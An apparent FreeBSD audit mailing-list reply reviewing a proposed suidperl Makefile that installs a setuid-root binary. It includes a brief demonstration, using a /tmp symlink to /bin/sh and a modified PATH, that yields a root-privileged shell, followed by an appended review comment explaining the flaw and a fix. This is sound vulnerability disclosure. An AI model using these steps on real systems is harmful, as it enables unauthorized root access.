From: Tim Robbins
To: Akinori MUSHA
Cc: audit@FreeBSD.ORG
Subject: Re: suidperl
Date: Thu, 4 Jul 2002 22:10:31 +1000

On Thu, Jul 04, 2002 at 07:15:58PM +0900, Akinori MUSHA wrote:
> Index: src/usr.bin/suidperl/Makefile > =================================================================== > RCS file: src/usr.bin/suidperl/Makefile > diff -N src/usr.bin/suidperl/Makefile > --- /dev/null 1 Jan 1970 00:00:00 -0000 > +++ src/usr.bin/suidperl/Makefile 4 Jul 2002 10:08:12 -0000 
> @@ -0,0 +1,15 @@ > +# $FreeBSD$ > + > +.PATH: ${.CURDIR}/../perl > + > +PROG= suidperl > +SRCS= perl.c > +NOMAN= > +WARNS?= 6 > + > +BINOWN= root > +.if defined(ENABLE_SUIDPERL) > +BINMODE=4555 > +.endif

This is unsafe:

$ ln -s /bin/sh /tmp/perl
$ env PATH=/tmp:$PATH /usr/bin/perl
# id
uid=1001(tim) euid=0(root) gid=1001(tim) groups=1001(tim), 0(wheel)

Tim
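
Review bot: The BINMODE=4555 line under .if defined(ENABLE_SUIDPERL), together with BINOWN= root, installs a setuid-root binary built from the shared ../perl/perl.c (SRCS= perl.c found through .PATH), and nothing in this Makefile makes that build behave differently from the ordinary one. The transcript in the reply shows a PATH-selected /tmp/perl being run with euid=0, so the setuid install should not be possible until suidperl has its own source, or a compile-time define set here, that executes a fixed absolute interpreter path and ignores the caller's PATH. The ENABLE_SUIDPERL knob is also undocumented in the hunk (NOMAN= and no comment); a comment stating what it installs and why it is off by default would help.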